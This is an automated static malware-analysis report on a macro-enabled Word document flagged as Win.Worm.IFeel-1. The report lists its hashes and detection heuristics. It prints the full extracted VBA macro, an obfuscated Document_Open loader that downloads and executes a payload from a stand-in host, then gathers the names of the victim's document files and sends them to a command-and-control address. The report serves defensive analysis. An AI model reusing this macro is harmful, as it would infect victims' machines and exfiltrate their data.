Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 3dafcad1510282a6…

MALICIOUS

Office (OOXML) / .DOCX

Size: 19.5 KB
Created: 2026-05-08 15:48:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2026-05-26
MD5: ead030784998a5b3d523ea7f2adead8b
SHA-1: 59136f4476886e1b8f033decd17ddd29e5eddaa9
SHA-256: 3dafcad1510282a6f5ccbcd2c0fe65348cfe4dd43484830e7b705d6dcfc34926
Risk Score: 390

Heuristics (9)

  • ClamAV: Win.Worm.IFeel-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Worm.IFeel-1
  • VBA project inside OOXML (severity: medium, rule: OOXML_VBA, 6 related findings)
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk (severity: critical, rule: OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            objStream.Write objXMLHTTP.ResponseBody
  • Obfuscated auto-exec VBA loader (severity: critical, rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        strDocumentsPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).SpecialFolders(Chr(77) & Chr(121) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        strDocumentsPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).SpecialFolders(Chr(77) & Chr(121) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
  • GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script
        Set objWMIService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(115) & Chr(58) & Chr(46) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50))
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (severity: low, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4582 bytes
SHA-256: 59e91a07d053f52eebce356ed45c9017dadde8f2d26659b6b43ad47cf77b3488
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim objWMIService As Object
    Dim objProcess As Object
    Dim objFSO As Object
    Dim objFolder As Object
    Dim objFile As Object
    Dim strDocumentsPath As String
    Dim strPayloadURL As String
    Dim strPayloadPath As String
    Dim strC2Server As String
    Dim strDataToSend As String
    Dim objXMLHTTP As Object
    Dim objStream As Object
    
    ' Set paths and URLs
    strDocumentsPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).SpecialFolders(Chr(77) & Chr(121) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
    strPayloadURL = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    strPayloadPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).ExpandEnvironmentStrings(Chr(37) & Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) & Chr(37)) & Chr(92) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    strC2Server = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(99) & Chr(50)
    
    ' Download payload
    Set objXMLHTTP = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84))
    objXMLHTTP.Open Chr(71) & Chr(69) & Chr(84), strPayloadURL, False
    objXMLHTTP.Send
    
    If objXMLHTTP.Status = 200 Then
        Set objStream = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
        objStream.Type = 1 ' adTypeBinary
        objStream.Open
        objStream.Write objXMLHTTP.ResponseBody
        objStream.SaveToFile strPayloadPath, 2 ' adSaveCreateOverWrite
        objStream.Close
    End If
    
    ' Execute payload using WMI
    Set objWMIService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(115) & Chr(58) & Chr(46) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50))
    Set objProcess = objWMIService.Get(Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
    objProcess.Create strPayloadPath, Null, Null, intProcessID
    
    ' Discovery: Enumerate .pdf and .docx files in Documents folder
    Set objFSO = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
    Set objFolder = objFSO.GetFolder(strDocumentsPath)
    
    For Each objFile In objFolder.Files
        If LCase(Right(objFile.Name, 4)) = Chr(46) & Chr(112) & Chr(100) & Chr(102) Or LCase(Right(objFile.Name, 5)) = Chr(46) & Chr(100) & Chr(111) & Chr(99) & Chr(120) Then
            ' Collect metadata or contents (example: file name and size)
            strDataToSend = strDataToSend & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(58) & Chr(32) & objFile.Name & Chr(44) & Chr(32) & Chr(83) & Chr(105) & Chr(122) & Chr(101) & Chr(58) & Chr(32) & objFile.Size & Chr(13) & Chr(10)
        End If
    Next
    
    ' Send collected data to C2 server
    Set objXMLHTTP = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84))
    objXMLHTTP.Open Chr(80) & Chr(79) & Chr(83) & Chr(84), strC2Server, False
    objXMLHTTP.Send strDataToSend
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 14336 bytes
SHA-256: fba4e5ed7923879b0488f7743a02b5709e47ab8ad0aa2a50e26fdf345ff893bb
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely